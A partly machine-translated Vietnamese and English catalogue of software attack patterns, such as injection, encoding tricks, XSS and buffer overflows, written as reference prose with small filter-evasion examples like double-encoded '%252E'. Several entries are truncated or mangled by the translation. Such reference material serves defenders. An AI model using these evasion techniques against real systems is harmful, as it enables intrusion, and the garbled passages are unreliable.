    Kẻ tấn công có thể khiến nạn nhân tải nội dung vào trình duyệt web của họ để vượt qua các kiểm soát vùng bảo mật và giành quyền truy cập vào các đặc quyền gia tăng để thực thi mã kịch bản hoặc các đối tượng web khác như điều khiển ActiveX hoặc applet chưa được ký. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Các trang trong vùng không đáng tin cậy sẽ có mức độ truy cập hệ thống thấp hơn và/hoặc bị hạn chế về các loại nội dung thực thi mà nó được phép gọi ra. Trong một cuộc tấn công kịch bản chéo vùng, một trang nên được chỉ định cho vùng ít đặc quyền hơn sẽ được cấp đặc quyền của vùng đáng tin cậy hơn. Điều này có thể được thực hiện bằng cách khai thác các lỗi trong trình duyệt, khai thác cấu hình không chính xác trong các điều khiển vùng, thông qua tấn công kịch bản chéo trang khiến nội dung của kẻ tấn công được coi là đến từ một trang đáng tin cậy hơn hoặc bằng cách tận dụng một số phần của hệ thống . Cuộc tấn công này khác với "Restful Privilege Escalation" ở chỗ cuộc tấn công sau có liên quan đến việc bảo mật không đầy đủ các phương thức truy cập RESTful [chẳng hạn như XÓA HTTP] trên máy chủ, trong khi tập lệnh chéo vùng tấn công khái niệm vùng bảo mật do trình duyệt triển khai

  • Tiêm bản đồ quan hệ đối tượng

    Kẻ tấn công tận dụng điểm yếu có trong mã lớp truy cập cơ sở dữ liệu được tạo bằng công cụ Ánh xạ quan hệ đối tượng [ORM] hoặc điểm yếu theo cách mà nhà phát triển đã sử dụng khung bền vững để đưa các lệnh SQL của riêng họ vào cơ sở dữ liệu bên dưới để thực thi. Cuộc tấn công ở đây tương tự như SQL injection đơn giản, ngoại trừ việc ứng dụng không sử dụng JDBC để nói chuyện trực tiếp với cơ sở dữ liệu mà thay vào đó, nó sử dụng lớp truy cập dữ liệu được tạo bởi công cụ ORM hoặc khung [e. g. Hibernate]. While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible

  • SQL injection thông qua giả mạo tham số SOAP

    Kẻ tấn công sửa đổi các tham số của thông báo SOAP được gửi từ người tiêu dùng dịch vụ đến nhà cung cấp dịch vụ để bắt đầu một cuộc tấn công SQL injection. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. Mẫu này mô tả một cuộc tấn công SQL injection với cơ chế phân phối là một thông báo SOAP

  • Lỗi bộ lọc thông qua lỗi tràn bộ đệm

    Trong cuộc tấn công này, ý tưởng là làm hỏng bộ lọc đang hoạt động bằng cách tạo ra một giao dịch quá khổ. Kẻ tấn công có thể cố gắng cung cấp các chuỗi đầu vào quá dài cho chương trình nhằm cố gắng áp đảo bộ lọc [bằng cách gây tràn bộ đệm] và hy vọng rằng bộ lọc không bị lỗi một cách an toàn [i. e. đầu vào của người dùng được đưa vào hệ thống không được lọc]

  • Làm mờ để thu thập dữ liệu nhạy cảm/người dùng liền kề khác

    Kẻ tấn công được ủy quyền gửi truy vấn tới mục tiêu sẽ gửi các biến thể của truy vấn dự kiến ​​với hy vọng rằng các truy vấn đã sửa đổi này có thể trả về thông tin [trực tiếp hoặc gián tiếp thông qua nhật ký lỗi] ngoài những gì nhóm truy vấn dự kiến ​​sẽ cung cấp. Nhiều ứng dụng khách sử dụng các mẫu truy vấn cụ thể khi tương tác với máy chủ và thường tự động điền vào các trường hoặc thuộc tính cụ thể. Ví dụ: một khách hàng truy vấn cơ sở dữ liệu nhân viên có thể có các mẫu sao cho người dùng chỉ cung cấp tên của mục tiêu và mẫu đó chỉ ra các trường được trả về [vị trí, chức vụ trong công ty, số điện thoại, v.v. ]. If the server does not verify that the query matches one of the expected templates, an attacker who is allowed to send normal queries could modify their query to try to return additional information. Trong ví dụ trên, thông tin bổ sung có thể bao gồm số an sinh xã hội hoặc mức lương. Các kỹ thuật làm mờ liên quan đến việc gửi các tin nhắn ngẫu nhiên hoặc không đúng định dạng đến mục tiêu và theo dõi phản hồi của mục tiêu. Trong cuộc tấn công cụ thể này, làm mờ được áp dụng cho định dạng của các mẫu dự kiến, tạo ra các biến thể yêu cầu thông tin bổ sung, loại trừ các mệnh đề giới hạn hoặc thay đổi các trường xác định người yêu cầu để phá vỡ các biện pháp kiểm soát truy cập. Kẻ tấn công có thể không biết tên của các trường để yêu cầu hoặc cách sửa đổi khác sẽ ảnh hưởng đến phản hồi của máy chủ, nhưng bằng cách thử nhiều biến thể hợp lý, cuối cùng chúng có thể kích hoạt phản hồi của máy chủ tiết lộ thông tin nhạy cảm. Các kết quả khác có thể xảy ra bao gồm sự cố máy chủ và mức tiêu thụ tài nguyên nếu các truy vấn không mong muốn khiến máy chủ rơi vào trạng thái không ổn định hoặc thực hiện tính toán quá mức

  • Tràn bộ đệm thông qua mở rộng tham số

    Trong cuộc tấn công này, phần mềm mục tiêu được cung cấp đầu vào mà kẻ tấn công biết sẽ được sửa đổi và mở rộng kích thước trong quá trình xử lý. Cuộc tấn công này dựa trên phần mềm đích không lường trước được rằng dữ liệu được mở rộng có thể vượt quá một số giới hạn nội bộ, do đó tạo ra lỗi tràn bộ đệm

  • Mã hóa URL

    Cuộc tấn công này nhắm mục tiêu mã hóa URL. Kẻ tấn công có thể lợi dụng nhiều cách mã hóa URL và lạm dụng việc giải thích URL. Một URL có thể chứa ký tự đặc biệt cần xử lý cú pháp đặc biệt để được diễn giải. Các ký tự đặc biệt được biểu thị bằng ký tự phần trăm theo sau là hai chữ số biểu thị mã bộ tám của ký tự gốc [%HEX-CODE]. Chẳng hạn, ký tự khoảng trắng US-ASCII sẽ được biểu thị bằng %20. Điều này thường được gọi là kết thúc thoát hoặc mã hóa phần trăm. Vì máy chủ giải mã URL từ các yêu cầu nên nó có thể hạn chế quyền truy cập vào một số đường dẫn URL bằng cách xác thực và lọc ra các yêu cầu URL mà nó nhận được. Kẻ tấn công sẽ cố gắng tạo một URL với một chuỗi các ký tự đặc biệt mà sau khi được máy chủ giải thích sẽ tương đương với một URL bị cấm. Có thể khó bảo vệ chống lại cuộc tấn công này vì URL có thể chứa định dạng mã hóa khác, chẳng hạn như mã hóa UTF-8, mã hóa Unicode, v.v. Kẻ tấn công cũng có thể thay đổi ý nghĩa của yêu cầu chuỗi URL bằng cách mã hóa dữ liệu được gửi đến máy chủ thông qua yêu cầu GET. Chẳng hạn, kẻ tấn công có thể thay đổi ý nghĩa của các tham số được sử dụng trong yêu cầu SQL và được gửi qua chuỗi URL [Xem phần Ví dụ]

  • Sử dụng mã hóa UTF-8 để bỏ qua logic xác thực

    Cuộc tấn công này là một biến thể cụ thể trong việc tận dụng các mã hóa thay thế để bỏ qua logic xác thực. Cuộc tấn công này tận dụng khả năng mã hóa đầu vào có khả năng gây hại trong UTF-8 và gửi nó tới các ứng dụng không mong đợi hoặc không hiệu quả trong việc xác thực tiêu chuẩn mã hóa này khiến việc lọc đầu vào trở nên khó khăn. UTF-8 [Định dạng chuyển đổi UCS/Unicode 8 bit] là mã hóa ký tự có độ dài thay đổi cho Unicode. Các ký tự UTF-8 hợp pháp dài từ một đến bốn byte. Tuy nhiên, phiên bản đầu tiên của đặc tả UTF-8 có một số mục sai [trong một số trường hợp, nó cho phép các ký tự quá dài]. Bộ mã hóa UTF-8 được cho là sử dụng mã hóa "ngắn nhất có thể", nhưng bộ giải mã ngây thơ có thể chấp nhận mã hóa dài hơn mức cần thiết. Theo RFC 3629, một hình thức tấn công đặc biệt tinh vi này có thể được thực hiện đối với trình phân tích cú pháp thực hiện kiểm tra tính hợp lệ quan trọng về bảo mật đối với dạng mã hóa UTF-8 của đầu vào, nhưng diễn giải một số chuỗi octet bất hợp pháp dưới dạng ký tự

  • Tràn bộ đệm trong các tiện ích dòng lệnh cục bộ

    Cuộc tấn công này nhắm vào các tiện ích dòng lệnh có sẵn trong một số shell. Kẻ tấn công có thể tận dụng lỗ hổng được tìm thấy trong tiện ích dòng lệnh để nâng cấp đặc quyền lên root

  • XSS dựa trên DOM

    Kiểu tấn công này là một dạng Cross-Site Scripting [XSS] trong đó một tập lệnh độc hại được chèn vào HTML phía máy khách đang được trình duyệt web phân tích cú pháp. Nội dung được cung cấp bởi một ứng dụng web có lỗ hổng bao gồm mã tập lệnh được sử dụng để thao tác Mô hình đối tượng tài liệu [DOM]. Mã tập lệnh này không xác thực đầu vào đúng cách hoặc không thực hiện mã hóa đầu ra phù hợp, do đó tạo cơ hội cho kẻ thù đưa tập lệnh độc hại khởi chạy cuộc tấn công XSS. Một điểm khác biệt chính giữa các cuộc tấn công XSS khác và các cuộc tấn công dựa trên DOM là trong các cuộc tấn công XSS khác, tập lệnh độc hại chạy khi trang web dễ bị tổn thương được tải ban đầu, trong khi một cuộc tấn công dựa trên DOM thực hiện sau khi tải trang. Một điểm khác biệt của các cuộc tấn công dựa trên DOM là trong một số trường hợp, tập lệnh độc hại hoàn toàn không được gửi đến máy chủ web dễ bị tấn công. Một cuộc tấn công như thế này được đảm bảo sẽ bỏ qua mọi nỗ lực lọc phía máy chủ để bảo vệ người dùng

  • tiêm SQL

    Cuộc tấn công này khai thác phần mềm mục tiêu xây dựng các câu lệnh SQL dựa trên đầu vào của người dùng. Kẻ tấn công thủ công các chuỗi đầu vào sao cho khi phần mềm đích xây dựng các câu lệnh SQL dựa trên đầu vào, thì câu lệnh SQL kết quả sẽ thực hiện các hành động khác với các hành động mà ứng dụng dự định. SQL Injection là kết quả của việc ứng dụng không xác thực hợp lệ đầu vào. Khi đầu vào do người dùng kiểm soát đặc biệt bao gồm cú pháp SQL được sử dụng mà không có xác thực hợp lệ như một phần của truy vấn SQL, có thể thu thập thông tin từ cơ sở dữ liệu theo những cách không được dự kiến ​​trong quá trình thiết kế ứng dụng. Tùy thuộc vào cơ sở dữ liệu và thiết kế của ứng dụng, cũng có thể tận dụng việc tiêm chích để cơ sở dữ liệu thực thi các lệnh liên quan đến hệ thống do kẻ tấn công lựa chọn. SQL Injection cho phép kẻ tấn công nói chuyện trực tiếp với cơ sở dữ liệu, do đó bỏ qua ứng dụng hoàn toàn. Tiêm thành công có thể gây lộ thông tin cũng như khả năng thêm hoặc sửa dữ liệu trong cơ sở dữ liệu. Để tiêm thành công SQL và lấy thông tin từ cơ sở dữ liệu, kẻ tấn công

  • Sử dụng dấu gạch chéo trong mã hóa thay thế

    Cuộc tấn công này nhắm mục tiêu mã hóa các ký tự Slash. Kẻ tấn công sẽ cố gắng khai thác các vấn đề lọc phổ biến liên quan đến việc sử dụng các ký tự gạch chéo để giành quyền truy cập vào tài nguyên trên máy chủ mục tiêu. Các hệ thống điều khiển theo thư mục, chẳng hạn như hệ thống tệp và cơ sở dữ liệu, thường sử dụng ký tự gạch chéo để biểu thị việc truyền tải giữa các thư mục hoặc các thành phần vùng chứa khác. Vì những lý do lịch sử không rõ ràng, PC [và do đó, Hệ điều hành Microsoft] chọn sử dụng dấu gạch chéo ngược, trong khi thế giới UNIX thường sử dụng dấu gạch chéo lên. Kết quả phân liệt là nhiều hệ thống dựa trên MS được yêu cầu hiểu cả hai dạng dấu gạch chéo. Điều này mang lại cho kẻ tấn công nhiều cơ hội để khám phá và lạm dụng một số vấn đề lọc phổ biến. Mục tiêu của mẫu này là khám phá phần mềm máy chủ chỉ áp dụng các bộ lọc cho một phiên bản chứ không phải phiên bản khác

  • Tiêm LDAP

    Kẻ tấn công thao túng hoặc thủ công truy vấn LDAP nhằm mục đích phá hoại tính bảo mật của mục tiêu. Một số ứng dụng sử dụng đầu vào của người dùng để tạo các truy vấn LDAP được máy chủ LDAP xử lý. Ví dụ: người dùng có thể cung cấp tên người dùng của họ trong quá trình xác thực và tên người dùng có thể được chèn vào truy vấn LDAP trong quá trình xác thực. Kẻ tấn công có thể sử dụng đầu vào này để đưa các lệnh bổ sung vào truy vấn LDAP có thể tiết lộ thông tin nhạy cảm. Ví dụ: nhập * trong truy vấn nói trên có thể trả về thông tin về tất cả người dùng trên hệ thống. Cuộc tấn công này rất giống với cuộc tấn công SQL injection ở chỗ nó thao túng một truy vấn để thu thập thông tin bổ sung hoặc ép buộc một giá trị trả về cụ thể

  • Tràn bộ đệm do tiêm phía máy khách

    Kiểu tấn công này khai thác lỗ hổng tràn bộ đệm trong phần mềm máy khách được nhắm mục tiêu thông qua việc tiêm nội dung độc hại từ dịch vụ thù địch được xây dựng tùy chỉnh

  • Tải trọng quá khổ XML

    Các ứng dụng thường cần chuyển đổi dữ liệu vào và ra khỏi định dạng XML bằng cách sử dụng trình phân tích cú pháp XML. Đối thủ có thể tiêm dữ liệu có thể gây ảnh hưởng xấu đến trình phân tích cú pháp XML khi nó đang được xử lý. Bằng cách cung cấp tải trọng quá khổ trong vectơ đầu vào sẽ được trình phân tích cú pháp XML xử lý, kẻ tấn công có thể khiến trình phân tích cú pháp XML tiêu thụ nhiều tài nguyên hơn trong khi xử lý, gây ra mức tiêu thụ bộ nhớ và sử dụng CPU quá mức, đồng thời có khả năng gây ra việc thực thi mã tùy ý. Mục tiêu của đối thủ là tận dụng sự thất bại của trình phân tích cú pháp để tạo lợi thế cho mình. Trong nhiều trường hợp, kiểu tấn công này sẽ dẫn đến Từ chối dịch vụ XML [XDoS] do ứng dụng trở nên không ổn định, đóng băng hoặc sập. Tuy nhiên, có thể gây ra sự cố dẫn đến thực thi mã tùy ý, dẫn đến nhảy từ mặt phẳng dữ liệu sang mặt phẳng điều khiển [R. 231. 1]. XDoS được liên kết chặt chẽ nhất với các dịch vụ web, SOAP và Rest, bởi vì những người yêu cầu dịch vụ từ xa có thể gửi các tải trọng XML độc hại tới nhà cung cấp dịch vụ được thiết kế để làm cạn kiệt bộ nhớ, CPU và/hoặc dung lượng ổ đĩa của nhà cung cấp dịch vụ. Điểm yếu chính trong XDoS là nhà cung cấp dịch vụ thường phải kiểm tra, phân tích cú pháp và xác thực các thông báo XML để xác định định tuyến, quy trình làm việc, cân nhắc bảo mật, v.v. Đó chính xác là những quy trình kiểm tra, phân tích cú pháp và xác thực mà XDoS nhắm đến. Cuộc tấn công này khai thác tính chất kết hợp lỏng lẻo của các dịch vụ web, trong đó nhà cung cấp dịch vụ có rất ít hoặc không có quyền kiểm soát đối với người yêu cầu dịch vụ và bất kỳ thông báo nào mà người yêu cầu dịch vụ gửi đi

  • Truy cập/Chặn/Sửa đổi HTTP Cookies

    This attack relies on the use of HTTP Cookies to store credentials, state information and other critical data on client systems. Có một số hình thức khác nhau của cuộc tấn công này. Hình thức đầu tiên của cuộc tấn công này liên quan đến việc truy cập HTTP Cookies để khai thác dữ liệu nhạy cảm có khả năng chứa trong đó. Hình thức thứ hai liên quan đến việc chặn dữ liệu này khi nó được truyền từ máy khách đến máy chủ. Thông tin bị chặn này sau đó được kẻ thù sử dụng để mạo danh người dùng/phiên từ xa. Dạng thứ ba là khi nội dung của cookie bị sửa đổi bởi đối thủ trước khi nó được gửi trở lại máy chủ. Ở đây, kẻ thù tìm cách thuyết phục máy chủ mục tiêu hoạt động trên thông tin giả mạo này

  • Thao tác dữ liệu đầu vào

    Kẻ tấn công khai thác điểm yếu trong xác thực đầu vào bằng cách kiểm soát định dạng, cấu trúc và thành phần dữ liệu đối với giao diện xử lý đầu vào. Bằng cách cung cấp đầu vào ở dạng không chuẩn hoặc không mong muốn, kẻ tấn công có thể tác động xấu đến tính bảo mật của mục tiêu. Ví dụ: sử dụng mã hóa ký tự khác có thể khiến văn bản nguy hiểm được coi là văn bản an toàn. Ngoài ra, kẻ tấn công có thể sử dụng một số cờ nhất định, chẳng hạn như phần mở rộng tệp, để làm cho ứng dụng đích tin rằng dữ liệu được cung cấp sẽ được xử lý bằng một trình thông dịch nhất định khi dữ liệu thực sự không thuộc loại thích hợp. Điều này có thể dẫn đến việc bỏ qua các cơ chế bảo vệ, buộc mục tiêu sử dụng các thành phần cụ thể để xử lý đầu vào hoặc nói cách khác, khiến dữ liệu của người dùng được xử lý khác với dự kiến. Cuộc tấn công này khác với Thao tác biến ở chỗ Thao tác biến cố gắng phá vỡ quá trình xử lý của mục tiêu thông qua giá trị của đầu vào trong khi Thao tác dữ liệu đầu vào tìm cách kiểm soát cách xử lý đầu vào

  • Chèn nội dung tệp

    Kiểu tấn công này khai thác sự tin tưởng của máy chủ trong việc thực thi nội dung từ xa, bao gồm các tệp nhị phân. Các tệp bị đầu độc bằng tải trọng độc hại [nhắm mục tiêu vào các hệ thống tệp mà phần mềm đích có thể truy cập] bởi kẻ thù và có thể được chuyển qua các kênh tiêu chuẩn như qua email và nội dung web tiêu chuẩn như tệp PDF và đa phương tiện. Kẻ thù khai thác các lỗ hổng đã biết hoặc xử lý các quy trình trong các quy trình đích. Các lỗ hổng kiểu này đã được tìm thấy trong rất nhiều ứng dụng thương mại từ Microsoft Office đến trình duyệt web Adobe Acrobat và Apple Safari. Khi kẻ thù biết các quy trình xử lý tiêu chuẩn và có thể xác định các lỗ hổng và điểm vào, chúng có thể bị khai thác bằng nội dung có vẻ bình thường. Khi cuộc tấn công được thực hiện, chương trình của đối thủ có thể truy cập các thư mục tương đối như C. \Program Files hoặc các thư mục hệ thống tiêu chuẩn khác để khởi động các cuộc tấn công tiếp theo. Trong trường hợp xấu nhất, các chương trình này được kết hợp với logic lan truyền khác và hoạt động như một loại vi-rút

  • làm mờ

    Trong mô hình tấn công này, kẻ thù tận dụng fuzzing để cố gắng xác định điểm yếu trong hệ thống. Fuzzing là một phương pháp kiểm tra chức năng và bảo mật phần mềm cung cấp đầu vào được xây dựng ngẫu nhiên cho hệ thống và tìm kiếm dấu hiệu cho thấy đã xảy ra lỗi phản hồi đầu vào đó. Fuzzing coi hệ thống như một hộp đen và hoàn toàn không có bất kỳ định kiến ​​hay giả định nào về hệ thống. Làm mờ có thể giúp kẻ tấn công phát hiện ra một số giả định nhất định về đầu vào của người dùng trong hệ thống. Làm mờ cung cấp cho kẻ tấn công một cách nhanh chóng để phát hiện ra một số giả định này mặc dù không nhất thiết phải biết bất cứ điều gì về nội bộ của hệ thống. Sau đó, những giả định này có thể được chống lại hệ thống bằng cách chế tạo đặc biệt đầu vào của người dùng có thể cho phép kẻ tấn công đạt được mục tiêu của mình

  • Chuyển đổi MIME

    Kẻ tấn công khai thác điểm yếu trong quy trình chuyển đổi MIME để gây tràn bộ đệm và giành quyền kiểm soát máy chủ thư. Hệ thống MIME được thiết kế để cho phép nhiều định dạng thông tin khác nhau được giải thích và gửi qua e-mail. Điểm tấn công tồn tại khi dữ liệu được chuyển đổi sang định dạng tương thích MIME và ngược lại

  • Tràn bộ đệm qua các liên kết tượng trưng

    Kiểu tấn công này tận dụng việc sử dụng các liên kết tượng trưng để gây tràn bộ đệm. An attacker can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. Khi phần mềm đích xử lý tệp liên kết tượng trưng, ​​nó có khả năng làm tràn bộ đệm bên trong khi kiểm tra không đủ giới hạn

  • AJAX Fingerprinting

    Cuộc tấn công này sử dụng các chuyến đi khứ hồi máy khách-máy chủ thường xuyên trong hội thoại Ajax để quét hệ thống. Mặc dù Ajax không tự mở ra các lỗ hổng mới, nhưng nó sẽ tối ưu hóa chúng theo quan điểm của kẻ tấn công. Trong nhiều cuộc tấn công XSS, kẻ tấn công phải có được "lỗ hổng trong một" và khai thác thành công lỗ hổng ở phía nạn nhân ngay lần đầu tiên, khi máy khách được chuyển hướng, kẻ tấn công có nhiều cơ hội tham gia vào các cuộc thăm dò, nhưng chỉ có một lần đầu tiên . Trong một ứng dụng web được sử dụng rộng rãi, đây không phải là vấn đề lớn vì 1 trên 1.000 là đủ tốt trong một ứng dụng được sử dụng rộng rãi. Bước đầu tiên phổ biến đối với kẻ tấn công là theo dõi môi trường để hiểu những cuộc tấn công nào sẽ hoạt động. Vì dấu chân phụ thuộc vào phép liệt kê, mô hình đàm thoại nhanh, nhiều yêu cầu và phản hồi điển hình trong các ứng dụng Ajax cho phép kẻ tấn công tìm kiếm nhiều lỗ hổng, cổng nổi tiếng, vị trí mạng, v.v.

  • Tiêm bao gồm phía máy chủ [SSI]

    Kẻ tấn công có thể sử dụng Tiêm bao gồm phía máy chủ [SSI] để gửi mã đến một ứng dụng web, sau đó được thực thi bởi máy chủ web. Làm như vậy cho phép kẻ tấn công đạt được kết quả tương tự như Cross Site Scripting, viz. , thực thi mã tùy ý và tiết lộ thông tin, mặc dù ở quy mô hạn chế hơn, vì các chỉ thị SSI không mạnh bằng ngôn ngữ kịch bản chính thức. Tuy nhiên, kẻ tấn công có thể thuận tiện truy cập vào các tệp nhạy cảm, chẳng hạn như tệp mật khẩu và thực thi lệnh trình bao

  • Thực thi dòng lệnh thông qua SQL injection

    Kẻ tấn công sử dụng các phương thức SQL injection tiêu chuẩn để đưa dữ liệu vào dòng lệnh để thực thi. Điều này có thể được thực hiện trực tiếp thông qua việc lạm dụng các chỉ thị như MSSQL_xp_cmdshell hoặc gián tiếp thông qua việc đưa dữ liệu vào cơ sở dữ liệu sẽ được hiểu là lệnh shell. Một thời gian sau, một ứng dụng phụ trợ không chính xác [hoặc có thể là một phần chức năng của cùng một ứng dụng] tìm nạp dữ liệu được đưa vào được lưu trữ trong cơ sở dữ liệu và sử dụng dữ liệu này làm đối số dòng lệnh mà không thực hiện xác thực hợp lệ. Dữ liệu độc hại thoát khỏi mặt phẳng dữ liệu đó bằng cách sinh ra các lệnh mới sẽ được thực thi trên máy chủ

  • Mã hóa kép

    Kẻ thù sử dụng quá trình mã hóa lặp lại cho một tập hợp ký tự [nghĩa là mã hóa ký tự mã hóa ký tự của một ký tự] để làm xáo trộn tải trọng của một yêu cầu cụ thể. Điều này có thể cho phép kẻ thù bỏ qua các bộ lọc cố gắng phát hiện các ký tự hoặc chuỗi không hợp lệ, chẳng hạn như các chuỗi hoặc ký tự có thể được sử dụng trong các cuộc tấn công truyền tải hoặc tiêm nhiễm. Bộ lọc có thể bắt được các chuỗi được mã hóa bất hợp pháp nhưng không thể bắt được các chuỗi được mã hóa kép. Ví dụ, một dấu chấm [. ], thường được sử dụng trong các cuộc tấn công truyền tải đường dẫn và do đó thường bị bộ lọc chặn, có thể được mã hóa URL thành %2E. Tuy nhiên, nhiều bộ lọc nhận dạng mã hóa này và vẫn sẽ chặn yêu cầu. Trong mã hóa kép, % trong mã hóa URL ở trên sẽ được mã hóa lại thành %25, dẫn đến %252E mà một số bộ lọc có thể không bắt được, nhưng vẫn có thể được hiểu là dấu chấm [. ] bởi các thông dịch viên trên mục tiêu

  • Thay đổi giá trị biến môi trường

    Kẻ tấn công trực tiếp hoặc gián tiếp sửa đổi các biến môi trường được sử dụng hoặc kiểm soát phần mềm đích. Mục tiêu của kẻ tấn công là làm cho phần mềm mục tiêu đi chệch khỏi hoạt động dự kiến ​​của nó theo cách có lợi cho kẻ tấn công

  • Định dạng chuỗi tiêm

    Đối thủ bao gồm các ký tự định dạng trong trường nhập chuỗi trên ứng dụng đích. Hầu hết các ứng dụng giả định rằng người dùng sẽ cung cấp văn bản tĩnh và có thể phản ứng không đoán trước được với sự hiện diện của ký tự định dạng. Ví dụ: trong một số chức năng của ngôn ngữ lập trình C như printf, ký tự định dạng %s sẽ in nội dung của một vị trí bộ nhớ mong muốn vị trí này xác định một chuỗi và ký tự định dạng %n in số DWORD được ghi trong bộ nhớ. Kẻ thù có thể sử dụng điều này để đọc hoặc ghi vào các vị trí bộ nhớ hoặc tệp hoặc đơn giản là thao túng giá trị của văn bản kết quả theo những cách không mong muốn. Bộ nhớ đọc hoặc ghi có thể dẫn đến sự cố chương trình và bộ nhớ ghi có thể dẫn đến việc thực thi mã tùy ý nếu đối thủ có thể ghi vào ngăn xếp chương trình

  • tiêm flash

    Kẻ tấn công lừa nạn nhân thực thi nội dung flash độc hại thực thi lệnh hoặc thực hiện cuộc gọi flash do kẻ tấn công chỉ định. Một ví dụ về cuộc tấn công này là flash chéo trang, tham số do kẻ tấn công kiểm soát đối với cuộc gọi tham chiếu tải từ nội dung do kẻ tấn công chỉ định

  • Khai thác lòng tin nơi khách hàng

    Một cuộc tấn công kiểu này khai thác các lỗ hổng trong xác thực kênh liên lạc giữa máy khách/máy chủ và tính toàn vẹn của dữ liệu. Nó tận dụng niềm tin ngầm mà máy chủ đặt vào máy khách, hoặc quan trọng hơn, cái mà máy chủ tin là máy khách. Kẻ tấn công thực hiện kiểu tấn công này bằng cách giao tiếp trực tiếp với máy chủ nơi máy chủ tin rằng nó chỉ giao tiếp với một máy khách hợp lệ. Có rất nhiều biến thể của kiểu tấn công này

  • Tải trọng lồng nhau XML

    Các ứng dụng thường cần chuyển đổi dữ liệu vào và ra khỏi định dạng XML bằng cách sử dụng trình phân tích cú pháp XML. Đối thủ có thể tiêm dữ liệu có thể gây ảnh hưởng xấu đến trình phân tích cú pháp XML khi nó đang được xử lý. Bằng cách lồng dữ liệu XML và làm cho dữ liệu này liên tục tự tham chiếu, kẻ tấn công có thể khiến trình phân tích cú pháp XML tiêu thụ nhiều tài nguyên hơn trong khi xử lý, gây ra mức tiêu thụ bộ nhớ quá mức và sử dụng CPU. Mục tiêu của đối thủ là tận dụng sự thất bại của trình phân tích cú pháp để tạo lợi thế cho mình. Trong hầu hết các trường hợp, kiểu tấn công này sẽ dẫn đến Từ chối dịch vụ XML [XDoS] do ứng dụng trở nên không ổn định, bị đóng băng hoặc bị sập. Tuy nhiên, có thể gây ra sự cố dẫn đến thực thi mã tùy ý, dẫn đến nhảy từ mặt phẳng dữ liệu sang mặt phẳng điều khiển [R. 230. 1]. XDoS được liên kết chặt chẽ nhất với các dịch vụ web, SOAP và Rest, bởi vì những người yêu cầu dịch vụ từ xa có thể gửi các tải trọng XML độc hại tới nhà cung cấp dịch vụ được thiết kế để làm cạn kiệt bộ nhớ, CPU và/hoặc dung lượng ổ đĩa của nhà cung cấp dịch vụ. Điểm yếu chính trong XDoS là nhà cung cấp dịch vụ thường phải kiểm tra, phân tích cú pháp và xác thực các thông báo XML để xác định định tuyến, quy trình làm việc, cân nhắc bảo mật, v.v. Đó chính xác là những quy trình kiểm tra, phân tích cú pháp và xác thực mà XDoS nhắm đến. Cuộc tấn công này khai thác bản chất liên kết lỏng lẻo của các dịch vụ web, trong đó nhà cung cấp dịch vụ có ít hoặc không có quyền kiểm soát đối với người yêu cầu dịch vụ và bất kỳ thông điệp nào mà người yêu cầu dịch vụ gửi đi

  • Tiêm XML

    Kẻ tấn công sử dụng đầu vào XML do người dùng kiểm soát được tạo thủ công để thăm dò, tấn công và đưa dữ liệu vào cơ sở dữ liệu XML, sử dụng các kỹ thuật tương tự như SQL injection. Đầu vào do người dùng kiểm soát có thể cho phép xem dữ liệu trái phép, bỏ qua xác thực hoặc ứng dụng ngoại vi để truy cập cơ sở dữ liệu XML trực tiếp và có thể thay đổi thông tin cơ sở dữ liệu

  • Tận dụng mã hóa thay thế

    Kẻ thù tận dụng khả năng mã hóa đầu vào hoặc nội dung có thể gây hại được ứng dụng sử dụng sao cho ứng dụng không hiệu quả trong việc xác thực tiêu chuẩn mã hóa này

  • Sử dụng chuỗi ký tự 'ma' hàng đầu để bỏ qua bộ lọc đầu vào

    Một số API sẽ loại bỏ một số ký tự đầu tiên khỏi chuỗi tham số. Đối thủ có thể cố ý giới thiệu các ký tự "ma" ở đầu [các ký tự phụ không ảnh hưởng đến tính hợp lệ của yêu cầu ở lớp API] cho phép đầu vào vượt qua các bộ lọc và do đó xử lý đầu vào của đối thủ. Điều này xảy ra khi API được nhắm mục tiêu sẽ chấp nhận dữ liệu đầu vào ở một số dạng cú pháp và diễn giải nó theo cách ngữ nghĩa tương đương, trong khi bộ lọc không tính đến toàn bộ phổ của các dạng cú pháp được API được nhắm mục tiêu chấp nhận

  • Khai thác nhiều lớp diễn giải đầu vào

    Kẻ tấn công cung cấp cho phần mềm đích dữ liệu đầu vào chứa các chuỗi ký tự đặc biệt được thiết kế để bỏ qua logic xác thực đầu vào. Khai thác này dựa trên mục tiêu thực hiện nhiều lần chuyển qua dữ liệu đầu vào và xử lý một "lớp" ký tự đặc biệt với mỗi lần chuyển. Theo cách này, kẻ tấn công có thể ngụy trang đầu vào mà nếu không sẽ bị từ chối là không hợp lệ bằng cách che giấu nó bằng các lớp ký tự đặc biệt/thoát sẽ bị loại bỏ bởi các bước xử lý tiếp theo. Mục tiêu trước tiên là khám phá các trường hợp lớp xác thực đầu vào thực thi trước một hoặc nhiều lớp phân tích cú pháp. Nghĩa là, đầu vào của người dùng có thể đi qua logic sau trong một ứng dụng. --> -->. Trong những trường hợp như vậy, kẻ tấn công sẽ cần cung cấp đầu vào sẽ chuyển qua trình xác thực đầu vào, nhưng sau khi chuyển qua trình phân tích cú pháp 2, sẽ được chuyển đổi thành thứ mà trình xác thực đầu vào phải dừng lại

  • Tập lệnh chéo trang [XSS]

    Kẻ thù nhúng các tập lệnh độc hại vào nội dung sẽ được cung cấp cho các trình duyệt web. Mục tiêu của cuộc tấn công là để phần mềm đích, trình duyệt phía máy khách, thực thi tập lệnh với mức đặc quyền của người dùng. Một cuộc tấn công kiểu này khai thác các lỗ hổng của chương trình được tạo ra bằng cách cho phép các máy chủ từ xa thực thi mã và tập lệnh. Ví dụ, các trình duyệt web có sẵn một số kiểm soát bảo mật đơn giản, nhưng nếu kẻ tấn công từ xa được phép thực thi các tập lệnh [thông qua việc đưa chúng vào nội dung do người dùng tạo như bảng thông báo] thì các kiểm soát này có thể bị bỏ qua. Hơn nữa, những cuộc tấn công này rất khó để người dùng cuối phát hiện

  • Tên tệp do người dùng kiểm soát

